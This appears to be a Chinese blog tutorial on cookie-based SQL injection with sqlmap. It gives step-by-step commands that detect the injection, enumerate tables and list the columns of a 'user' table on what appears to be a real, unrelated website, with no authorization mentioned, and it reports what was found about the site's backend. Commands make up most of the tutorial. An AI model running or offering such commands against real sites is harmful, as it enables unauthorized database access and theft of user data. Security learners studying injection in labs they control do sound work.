Sqlmap Cookie注入 教程

Sqlmap是什么我就不多说了,它就是一个渗透测试工具,主要是用来SQL注入的,支持很多种类型的数据库。用工具sqlmap来做cookie注入很简单,只需要用sqlmap cookie注入命令即可!具体操作如下:

 

1、检测是否有cookie注入?

root@Kali:~# sqlmap -u http://www.zyczbq.com/Newsshow.asp --cookie "ID=212" --level 3

注意:这里或许很慢,请大家耐心等待即可!

sqlmap -u http://www.zyczbq.com/Newsshow.asp --cookie "ID=212" --level 3

得到如下结果:

存在Cookie注入,布尔类型的盲注等。网站开发语言是ASP,数据库类型是Microsoft Access;服务器系统是Windows;

 

2、猜表名

root@Kali:~# sqlmap -u http://www.zyczbq.com/Newsshow.asp --cookie "ID=212" --level 3 --tables

sqlmap -u http://www.zyczbq.com/Newsshow.asp --cookie "ID=212" --level 3 --tables

 

3、猜列名

root@Kali:~# sqlmap -u http://www.zyczbq.com/Newsshow.asp --cookie "ID=212" --level 3 -T user --columns

 

sqlmap -u http://www.zyczbq.com/Newsshow.asp --cookie "ID=212" --level 3 -T user --columns

 

当然,当我再去猜admin表的时候,sqlmap就报错如下:

[CRITICAL] can't use column existence chek because of detected inval id resultes(most probably caused by inability of the used injection to distinguish errornous results)

中文翻译

[CRITICAL]不能使用列存在,因为检测到的内部空间结果(最可能是由于使用的注入无法区分错误结果)

[CRITICAL] can't use column existence chek because of detected inval id resultes(most probably caused by inability of the used injection to distinguish errornous results)

 

cookie注入方法就是这样的,虽然猜不到列名,不过,不用太在意结果,知道原理即可!还是要以一个正确的学习态度为主。

头像
  • ¥ 98.0元
  • 市场价:298.0元
  • ¥ 0.0元
  • 市场价:99.0元
  • ¥ 199.0元
  • 市场价:899.0元
  • ¥ 99.0元
  • 市场价:99.0元

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: